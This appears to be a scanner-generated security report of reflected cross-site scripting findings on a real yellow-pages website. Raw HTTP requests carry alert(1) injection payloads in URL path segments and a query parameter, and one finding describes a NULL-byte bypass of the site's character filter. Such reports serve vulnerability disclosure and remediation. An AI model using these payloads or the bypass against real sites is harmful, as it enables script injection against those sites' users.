GET /common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ee7"-alert(1)-"7ec2f5075e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df457"-alert(1)-"a7b7f4d7dfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db562"-alert(1)-"02c46e9b05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 442ba"-alert(1)-"a80008c80c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 470ae"-alert(1)-"830ee1c48fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539eb"-alert(1)-"4cc78ad7314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common539eb"-alert(1)-"4cc78ad7314/js/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb37a"-alert(1)-"32622685d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsbb37a"-alert(1)-"32622685d4e/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e5"-alert(1)-"7e6c3fe42b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf9"-alert(1)-"8dab2c2c71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0"-alert(1)-"aaabf2e973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eabbc"-alert(1)-"b304378f63d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/sendtom.jseabbc"-alert(1)-"b304378f63d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4461d"-alert(1)-"6930c85dd26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91df3"-alert(1)-"e8a95c1c0a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc0a"-alert(1)-"689c16f939c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ab9"-alert(1)-"d45a7fa5aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df462"-alert(1)-"539d2934731 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdf462"-alert(1)-"539d2934731/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8519c"-alert(1)-"64c92015151 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/swfobject.js8519c"-alert(1)-"64c92015151 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633b9"-alert(1)-"357d38575b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common633b9"-alert(1)-"357d38575b/js/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd66"-alert(1)-"3845f6ea7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb24"-alert(1)-"a6a108b5958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/widget.jsbcb24"-alert(1)-"a6a108b5958 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8b6"-alert(1)-"067297a1807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1f8b6"-alert(1)-"067297a1807/shared.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d77a"-alert(1)-"d7d525d2174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/shared.js5d77a"-alert(1)-"d7d525d2174 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of the C request parameter is copied into the HTML document as plain text between tags. The payload %00e5acd<script>alert(1)</script>93fce6bf183 was submitted in the C parameter. This input was echoed as e5acd<script>alert(1)</script>93fce6bf183 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /listings.jsp?C=florists%00e5acd<script>alert(1)</script>93fce6bf183 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 500 Internal Server Error
Server: Unspecified
Set-Cookie: JSESSIONID=C5E4B03A766E89FAC74949B1AE645437; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 03 Feb 2011 17:10:53 GMT
Connection: close
The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00f4"%3balert(1)//9ea80311ee5 was submitted in the C parameter. This input was echoed as b00f4";alert(1)//9ea80311ee5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp?C=floristsb00f4"%3balert(1)//9ea80311ee5 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=8C1509CAA35A56F034FAD97133ED8997; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=C:floristsb00f4%22%3Balert%281%29%2F%2F9ea80311ee5$; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 57369
Date: Thu, 03 Feb 2011 17:10:47 GMT
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 277d5"-alert(1)-"5f0b41eeee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp277d5"-alert(1)-"5f0b41eeee6 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
